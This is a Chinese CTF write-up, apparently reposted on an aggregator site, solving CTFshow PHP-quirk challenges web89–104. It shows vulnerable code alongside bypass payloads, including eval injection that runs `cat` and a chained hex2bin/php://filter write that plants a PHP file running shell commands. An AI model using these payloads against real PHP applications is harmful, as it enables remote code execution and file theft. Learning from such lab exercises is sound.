云曦暑期学习第三周——ctfshow--php特性(89-104)

这篇具有很好参考价值的文章主要介绍了云曦暑期学习第三周——ctfshow--php特性(89-104)。希望对大家有所帮助。如果存在错误或未考虑完全的地方,请大家不吝赐教,您也可以点击"举报违法"按钮提交疑问。

目录

web89  preg_match函数 、数组

web90  intval()函数、强比较

web91  正则修饰符

web92  intval()函数、弱比较

web93  八进制、小数点

web94  strpos() 函数、小数点

web95  小数点

web96   highlight_file() 下的目录路径

web97  数组

web98  三目运算符

web99   in_array函数

web100   优先级

web101 反射类

web102   call_user_func;file_put_contents

web103

web104  sha1


web89  preg_match函数 、数组

include("flag.php");
highlight_file(__FILE__);

if(isset($_GET['num'])){
    $num = $_GET['num'];
    if(preg_match("/[0-9]/", $num)){
        die("no no no!");
    }
    if(intval($num)){
        echo $flag;
    }
}

intval() 函数用于获取变量的整数值。

intval() 函数通过使用指定的进制 base 转换(默认是十进制),返回变量 var 的 integer 数值。 intval() 不能用于 object,否则会产生 E_NOTICE 错误并返回 1。

PHP 4, PHP 5, PHP 7

云曦暑期学习第三周——ctfshow--php特性(89-104),php,android,开发语言

云曦暑期学习第三周——ctfshow--php特性(89-104),php,android,开发语言

 但是 preg_match函数无法处理数组,所以构建一个数组,num[ ]=后面可以随便填一些数字也可以不填,就可以直接出来。

云曦暑期学习第三周——ctfshow--php特性(89-104),php,android,开发语言

web90  intval()函数、强比较

include("flag.php");
highlight_file(__FILE__);
if(isset($_GET['num'])){
    $num = $_GET['num'];
    if($num==="4476"){     强类型判断 不仅判断值,还会判断类型
        die("no no no!");
    }
    if(intval($num,0)===4476){   //从num的第一个位置开始转换成整形数据
        echo $flag;
    }else{
        echo intval($num,0);
    }
} 

intval函数取的是我们所输入内容开头的整数,当我们输入的num的值为123a的时候,经过intval函数的转化,就变成了123

所以第一种方法,让num的值等于4476a

再来看一下intval的语法:

int intval ( mixed $var [, int $base = 10 ] )

参数说明:

    $var:要转换成 integer 的数量值。
    $base:转化所使用的进制。

如果 base 是 0,通过检测 var 的格式来决定使用的进制:

    如果字符串包括了 "0x" (或 "0X") 的前缀,使用 16 进制 (hex);否则,
    如果字符串以 "0" 开始,使用 8 进制(octal);否则,
    将使用 10 进制 (decimal)。

4476的16进制:0x117c

4476的8进制:010574
 

第二种方法:

num=010574或者num=0x117c云曦暑期学习第三周——ctfshow--php特性(89-104),php,android,开发语言

 云曦暑期学习第三周——ctfshow--php特性(89-104),php,android,开发语言

 云曦暑期学习第三周——ctfshow--php特性(89-104),php,android,开发语言

web91  正则修饰符

show_source(__FILE__);
include('flag.php');
$a=$_GET['cmd'];
if(preg_match('/^php$/im', $a)){   //以php开头并且以php结尾,多行匹配,i表示不区分大小写
    if(preg_match('/^php$/i', $a)){  //单行匹配以php开头,同时也以php结尾
        echo 'hacker';
    }
    else{
        echo $flag;
    }
}
else{
    echo 'nonononono';
} 

正则修饰符:

i:不区分大小写,这里就是将匹配的目标设置为不区分大小写,即php和PHP没有区别

m:表示多行匹配

   

使用边界字符 ^ 和 $ 匹配每一行的开头和结尾,记住是多行,而不是整个字符串的开头和结尾。所有行只要有一行匹配到了就返回1

^:匹配输入字符串的开始位置。$:匹配输入字符串的结束位置。

在默认的情况下,一个字符串无论是否换行只有一个开始^和结束$。如果增加了多行匹配的话(也就是说加上了m),那么每行都有一个开始^和结束$。

payload:?num=换行+php(%0aphp),所以经过第一个正则匹配的时候,由于是多行匹配,我们的payload中的第二行就是以php开始以php结束的。经过第二个正则匹配的时候,因为payload是%0aphp,便不符合以php开始以php结束。执行else。云曦暑期学习第三周——ctfshow--php特性(89-104),php,android,开发语言

web92  intval()函数、弱比较

include("flag.php");
highlight_file(__FILE__);
if(isset($_GET['num'])){
    $num = $_GET['num'];
    if($num==4476){
        die("no no no!");
    }
    if(intval($num,0)==4476){
        echo $flag;
    }else{
        echo intval($num,0);
    }
}

与90关类似

把十进制转化为十六进制与八进制即可

num=010574或者num=0x117c

web93  八进制、小数点

include("flag.php");
highlight_file(__FILE__);
if(isset($_GET['num'])){
    $num = $_GET['num'];
    if($num==4476){
        die("no no no!");
    }
    if(preg_match("/[a-z]/i", $num)){
        die("no no no!");
    }
    if(intval($num,0)==4476){
        echo $flag;
    }else{
        echo intval($num,0);
    }
}

过滤了字母,所以可以用8进制或者小数点

/?num=010574

/?num=4476.1   //传入小数会直接取整从而实现绕过

 云曦暑期学习第三周——ctfshow--php特性(89-104),php,android,开发语言

 云曦暑期学习第三周——ctfshow--php特性(89-104),php,android,开发语言

web94  strpos() 函数、小数点

include("flag.php");
highlight_file(__FILE__);
if(isset($_GET['num'])){
    $num = $_GET['num'];
    if($num==="4476"){
        die("no no no!");
    }
    if(preg_match("/[a-z]/i", $num)){
        die("no no no!");
    }
    if(!strpos($num, "0")){
        die("no no no!");
    }
    if(intval($num,0)===4476){
        echo $flag;
    }
} 

strpos() 函数

查找字符串在另一字符串中第一次出现的位置(区分大小写)。

返回值: 返回字符串在另一字符串中第一次出现的位置,如果没有找到字符串则返回 FALSE。注释: 字符串位置从 0 开始,不是从 1 开始。

所以strpos函数的意思就是查找0在$num中的位置是否是0(此处就是过滤了八进制的方法),只能使用小数的方法去绕过。且小数位还要存在一个0,假设我们的payload为4476.3,那么在经过strpos函数的时候,没有找到0,那么就会返回FALSE,在经过前面的!,就变成了TRUE。所以我们需要在小数的某一个位置带上0,绕过strpos函数。

payload:?num=4476.0云曦暑期学习第三周——ctfshow--php特性(89-104),php,android,开发语言

web95  小数点

include("flag.php");
highlight_file(__FILE__);
if(isset($_GET['num'])){
    $num = $_GET['num'];
    if($num==4476){
        die("no no no!");
    }
    if(preg_match("/[a-z]|\./i", $num)){
        die("no no no!!");
    }
    if(!strpos($num, "0")){
        die("no no no!!!");
    }
    if(intval($num,0)===4476){
        echo $flag;
    }
}

增加了对点的过滤,同时需要满足:

$num的值不能是4476

不能含有大小写字母

num中必须包含着0,但是开头不能是0

可以使用换行或者空格或者+号,再加上八进制来绕过。

    payload:
        ?num= 010574 //注意有空格
        ?num=%20010574
        ?num=%0a010574
        ?num=+010574
        ?num=%09010574
        ?num=%2b010574

+的url编码是%2b

空格的编码是%20云曦暑期学习第三周——ctfshow--php特性(89-104),php,android,开发语言

web96   highlight_file() 下的目录路径

highlight_file(__FILE__);

if(isset($_GET['u'])){
    if($_GET['u']=='flag.php'){
        die("no no no");
    }else{
        highlight_file($_GET['u']);
    } 

先随便传个参数,看到文件的路径

云曦暑期学习第三周——ctfshow--php特性(89-104),php,android,开发语言

 构造payload:

/?u=/var/www/html/flag.php              绝对路径
/?u=./flag.php                          相对路径
/?u=php://filter/resource=flag.php      php伪协议  

云曦暑期学习第三周——ctfshow--php特性(89-104),php,android,开发语言

php://filter

官方:php://filter 是一种元封装器, 设计用于数据流打开时的筛选过滤应用。 这对于一体式(all-in-one)的文件函数非常有用,类似 readfile()、 file() 和 file_get_contents(), 在数据流内容读取之前没有机会应用其他过滤器。

php://filter参数:
resource=<要过滤的数据流> : 这个参数是必须的。它指定了你要筛选过滤的数据流。
read=<读链的筛选列表> :该参数可选。可以设定一个或多个过滤器名称,以管道符(|)分隔。
write=<写链的筛选列表> : 该参数可选。可以设定一个或多个过滤器名称,以管道符(|)分隔。
<;两个链的筛选列表>    任何没有以 read= 或 write= 作前缀 的筛选器列表会视情况应用于读或写链。
 

之前写过有关php://filter的学习笔记

php://filter_php://filter/_木…的博客-CSDN博客

web97  数组

md5弱类型比较可以直接数组绕过,其结果都会转换为null

a[]=1&b[]=2

云曦暑期学习第三周——ctfshow--php特性(89-104),php,android,开发语言

web98  三目运算符

include("flag.php");
$_GET?$_GET=&$_POST:'flag';
$_GET['flag']=='flag'?$_GET=&$_COOKIE:'flag';
$_GET['flag']=='flag'?$_GET=&$_SERVER:'flag';
highlight_file($_GET['HTTP_FLAG']=='flag'?$flag:__FILE__);
&是引用符号,意思是:不同的名字访问同一个变量内容。php的引用是在变量或者函数、对象等前面加上&符号,PHP 的引用允许你用两个变量来指向同一个内容

$_GET?$_GET=&$_POST:'flag';意思:如果有GET传参的话,那么就将$_POST传入的参数赋值给$_GET变量,换句话说就是POST传入的参数和GET传入的参数是相同的。之后我们就可以通过POST来覆盖掉GET的值。

highlight_file($_GET['HTTP_FLAG']=='flag'?$flag:__FILE__)意思:如果有通过GET方法传参'HTTP_FLAG=flag',就highlight_file($flag)。否则highlight_file(__FILE__)

云曦暑期学习第三周——ctfshow--php特性(89-104),php,android,开发语言

web99   in_array函数

highlight_file(__FILE__);
$allow = array();  //创建一个空数组
for ($i=36; $i < 0x36d; $i++) { 
    array_push($allow, rand(1,$i));   //往$allow 末尾追加一个随机数
}
if(isset($_GET['n']) && in_array($_GET['n'], $allow)){  //搜索
    file_put_contents($_GET['n'], $_POST['content']);    //把content的数据写入到n中
} 

array_push函数:用于将一个或多个元素插入/推入数组

rand()函数:随机生成数组rand(min,max)

file_put_contents() 函数:把一个字符串写入文件中。

该函数访问文件时,遵循以下规则:

  1. 如果设置了 FILE_USE_INCLUDE_PATH,那么将检查 *filename* 副本的内置路径
  2.  如果文件不存在,将创建一个文件
  3.  打开文件
  4.  如果设置了 LOCK_EX,那么将锁定文件
  5.  如果设置了 FILE_APPEND,那么将移至文件末尾。否则,将会清除文件的内容
  6.  向文件中写入数据
  7.  关闭文件并对所有文件解锁

如果成功,该函数将返回写入文件中的字符数。如果失败,则返回 False。
 

云曦暑期学习第三周——ctfshow--php特性(89-104),php,android,开发语言​ 云曦暑期学习第三周——ctfshow--php特性(89-104),php,android,开发语言

云曦暑期学习第三周——ctfshow--php特性(89-104),php,android,开发语言

访问1.php

 云曦暑期学习第三周——ctfshow--php特性(89-104),php,android,开发语言

发现包含flag的文件是flag36d.php,读取这个文件

云曦暑期学习第三周——ctfshow--php特性(89-104),php,android,开发语言

 云曦暑期学习第三周——ctfshow--php特性(89-104),php,android,开发语言

web100   优先级

highlight_file(__FILE__);
include("ctfshow.php");
//flag in class ctfshow;
$ctfshow = new ctfshow();
$v1=$_GET['v1'];
$v2=$_GET['v2'];
$v3=$_GET['v3'];
$v0=is_numeric($v1) and is_numeric($v2) and is_numeric($v3);  //因为赋值符号的优先级要高于`and`和`or`,所以v0的值只与is_numeric($v1)有关,也就是只要v1为数字即可。
if($v0){
    if(!preg_match("/\;/", $v2)){
        if(preg_match("/\;/", $v3)){
            eval("$v2('ctfshow')$v3");
        }  //几乎没有过滤,而且对于v3不仅没有过滤,还要求你有斜杠和分号,就当是提示了吧。直接构造语句执行
    }
    
} 

is_numeric ——检测变量是否为数字或数字字符串 ,为数字或字符串时返回为真。 

因为 &&与||的优先级是高于and与or的
=的优先级高于and与or,所有 v 1为数字即可让,即可让 v1为数字即可让v0为True
构造出:var_dump($ctfshow);

payload:

?v1=1&v2=var_dump($ctfshow)/*&v3=*/;      //利用注释符号/**/

也可以利用?>和<?=

?v1=1&v2=&v3=?><?=`cat ctfshow.php`;  //反引号执行命令

云曦暑期学习第三周——ctfshow--php特性(89-104),php,android,开发语言​ 

 云曦暑期学习第三周——ctfshow--php特性(89-104),php,android,开发语言

web101 反射类

云曦暑期学习第三周——ctfshow--php特性(89-104),php,android,开发语言

反射类可以说成是类的一个映射,可以利用反射类来代替有关类的应用的任何语句

其属性为类的一个名称,这道题目里面类的名称为ctfshow

PHP Reflection API是PHP5才有的新功能,它是用来导出或提取出关于类、方法、属性、参数等的详细信息,包括注释。
$class = new ReflectionClass(‘ctfshow’); // 建立ctfshow这个类的反射类
$instance = class −> newInstanceArgs(class->newInstanceArgs( class−>newInstanceArgs(args); // 相当于实例化ctfshow类

payload:?v1=1&v2=print new ReflectionClass&v3=;

云曦暑期学习第三周——ctfshow--php特性(89-104),php,android,开发语言

外包ctfshow为ctfshow{02ac0609-3e71-4d4a-b38a-4d4910d05c0} 

把0x2d换成~

会发现少一位了然后就抓包爆破最后一位

web102   call_user_func;file_put_contents

<?php
highlight_file(__FILE__);
$v1 = $_POST['v1'];
$v2 = $_GET['v2'];
$v3 = $_GET['v3'];
$v4 = is_numeric($v2) and is_numeric($v3);
if($v4){
    $s = substr($v2,2);
    $str = call_user_func($v1,$s);
    echo $str;
    file_put_contents($v3,$str);
}
else{
    die('hacker');
}
?>

云曦暑期学习第三周——ctfshow--php特性(89-104),php,android,开发语言云曦暑期学习第三周——ctfshow--php特性(89-104),php,android,开发语言

 回调函数:call_user_func(callback,parameter )

PHP函数详解:call_user_func()使用方法_call_user_func php_风雅的远行者的博客-CSDN博客

第一个参数 callback 是被调用的回调函数(一般为闭包函数),其余参数是回调函数的参数。

$v1:这里使用hex2bin()作为回调函数(16进制转化为字符)
$v2:这里要求全是数字。
$v3:使用PHP伪协议写入文件

    v3=php://filter/write=convert.base64-decode/resource=1.php

思路:首先我们要将一部分代码写入文件中但有代码可知我们要从v2中得到相关的代码,v2又需要是数字,所以我们要保证v2是数字,然后str是代码,可以先将v3使用伪协议用base64写入,所以这个时候的str是base64代码,call_user_func()函数为一个过度,hex2bin函数可以转换十六进制。V1要传入的是就是hex2bin函数,之后调用所以,v2应该是先base64然后是十六进制
 

$a='<?=`cat *`;';

$b=base64_encode($a);  // PD89YGNhdCAqYDs=
$c=bin2hex($b);      //等号在base64中只是起到填充的作用,不影响具体的数据内容,直接用去掉,=和带着=的base64解码出来的内容是相同的。

云曦暑期学习第三周——ctfshow--php特性(89-104),php,android,开发语言

输出   5044383959474e6864434171594473
(带e的话会被认为是科学计数法,可以通过is_numeric检测)

v2=5044383959474e6864434171594473

因为是从下标为2的位置取的字符串,所以要在前面加两个数字(随意)
v2=005044383959474e6864434171594473

payload:

?v2=005044383959474e6864434171594473&v3=php://filter/write=convert.base64-decode/resource=1.php

v1=hex2bin (post)

传参:

云曦暑期学习第三周——ctfshow--php特性(89-104),php,android,开发语言

 访问1.php云曦暑期学习第三周——ctfshow--php特性(89-104),php,android,开发语言

 查看源代码云曦暑期学习第三周——ctfshow--php特性(89-104),php,android,开发语言

web103 

这题比较上一题就多了正则匹配,不能写入php,与上一题一样,这里就不赘述了

web104  sha1

highlight_file(__FILE__);
include("flag.php");

if(isset($_POST['v1']) && isset($_GET['v2'])){
    $v1 = $_POST['v1'];
    $v2 = $_GET['v2'];
    if(sha1($v1)==sha1($v2)){
        echo $flag;
    }
} 

sha1与md5类似。都无法处理数组

get : v2[]=0
post: v1[]=1

云曦暑期学习第三周——ctfshow--php特性(89-104),php,android,开发语言文章来源地址https://www.toymoban.com/news/detail-626526.html

到了这里,关于云曦暑期学习第三周——ctfshow--php特性(89-104)的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处: 如若内容造成侵权/违法违规/事实不符,请点击违法举报进行投诉反馈,一经查实,立即删除!

领支付宝红包 赞助服务器费用

相关文章

  • 云曦暑期学习第一周——sql注入

    sql注入是指web应用程序对用户输入数据的合法性没有判断,前端传入后端的参数是攻击者可控的,并且参数带入数据库查询,攻击者可以通过构造不同的sql语句来实现对数据库的任意操作 条件: 1.参数用户可控:前端传给后端的参数内容是用户可以控制的 2.参数带入数据查询

    2024年02月16日
    浏览(36)
  • CTFSHOW php 特性

    目录 web89 数组绕过正则 PHP preg_match() 函数 | 菜鸟教程  web90  ===的绕过 首先 我们输入一个 4476a 就可以绕过 第一个nonono 也可以使用浮点型 也可以使用进制 web91   了解正则 web92 == 绕过 进制  浮点型 科学计数法 web93 过滤字母 浮点型  进制  web94 strpos(字符串,字符) 八进制

    2024年02月14日
    浏览(42)
  • 【Web】CTFSHOW PHP特性刷题记录(全)

    知其然知其所以然,尽量把每种特性都详细讲明白。 目录 web89 web90 web91 web92 web93 web94 web95 web96 web97 web98 web99 web100 web101 web102 web103 web104 web105 web106 web107 web108 web109 web110 web111 web112 web113 web114 web115 web123 web125 web126 web127 web128 web129 web130 web131 web132 web133 web134 web135 web136 web137 web138

    2024年01月17日
    浏览(40)
  • ctfshow web入门 php特性 web108-web112

    strrev() 反转字符串 ereg 存在空字符截断(只会匹配%00前面的字符),这个函数匹配到为true,没有匹配到为false,877为0x36d的十进制数值 payload: 类可以输出,就是当类被当作字符串执行,会调用__trosting魔术方法,这个类要有这个魔术方法,并且要有返回值才可以输出,这个值要可控

    2024年02月11日
    浏览(43)
  • CTFshow web93-104关

    这周要学习的是php代码审计 根据师兄的作业 来做web入门的93-104关 看代码 进行分析 他的主函数 include(\\\"flag.php\\\"); highlight_file(__FILE__); if(isset($_GET[\\\'num\\\'])){     $num = $_GET[\\\'num\\\'];     if($num==4476){         die(\\\"no no no!\\\");     }     if(preg_match(\\\"/[a-z]/i\\\", $num)){         di

    2024年02月14日
    浏览(37)
  • CTFSHOW php命令执行

    目录 web29  过滤flag web30   过滤system php web31 过滤    cat|sort|shell|. 这里有一个新姿势 可以学习一下 web32 过滤 ;`` \\\'\\\' . web33 web34 web35 web36 web37 data伪协议 web38 短开表达式 web39 web40   __FILE__命令的扩展 web41 web42 重定向 web43 web44 web45 web46 web47 web48 web49 web50 web51  web52 web53 web54 

    2024年02月13日
    浏览(39)
  • ctfshow 第三届愚人杯 easy_php

    这题学的了一些小tips,这里讲解一下。 这里详细讲解一下使用c绕过wakup。 O标识符代表对象类型,而C标识符代表类名类型。如果将O替换为C,则在反序列化时会将其解释为一个新的类名字符串,从而创建一个新的类而不是对象。因为这个新的类没有被序列化过,所以它没有任

    2023年04月26日
    浏览(66)
  • 【Web】CTFSHOW PHP文件包含刷题记录(全)

    温故知新。 目录 web78 web79 web80 web81 web82 web83 web84 web85 web86 web87 web88 伪协议base64编码直接读出文件内容就行 一眼data伪协议包含php脚本 data也被禁了,日志包含即可 多禁了一个\\\":\\\",还是可以日志包含 连\\\".\\\"都被禁用了,/tmp/sess_xxx是不带点的,尝试多线程条件竞争包含临时目录下

    2024年02月02日
    浏览(46)
  • 【Web】CTFSHOW PHP命令执行刷题记录(全)

    目录 web29 web30 web31 web32 web33 web34 web35 web36 web37-39 web40 web41 (y4✌脚本) web42 -44 web45 web46 -49 web50 web51 web52 web53 web54 web55-56 web57 web58 web59 web60 web61 web62 web63-65 web66-67 web68-70 web71 web72 web73-74 web75-76 web77 期末复习不了一点,不如做点旧题醒一醒手感。每一题都尽量用不同payload,如果

    2024年01月23日
    浏览(42)
  • Ctfshow web入门 sqli-labs特性篇 web517-web568 详细题解 全

    这里插一句。 limit 100,1 是从第100条数据开始,读取1条数据。 limit 6 是读取前6条数据。 报错注入 绕过字符串返回长度限制。 盲注 布尔和时间都可以的。 闭合换成了 \\\" 。其他和上题一样。 ctfshow–flagpa–flag3a3– 测一下回显位 布尔盲注还是能用。不过这次我们换个方法。 它

    2024年02月15日
    浏览(49)

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

博客赞助

微信扫一扫打赏

请作者喝杯咖啡吧~博客赞助

支付宝扫一扫领取红包,优惠每天领

二维码1

领取红包

二维码2

领红包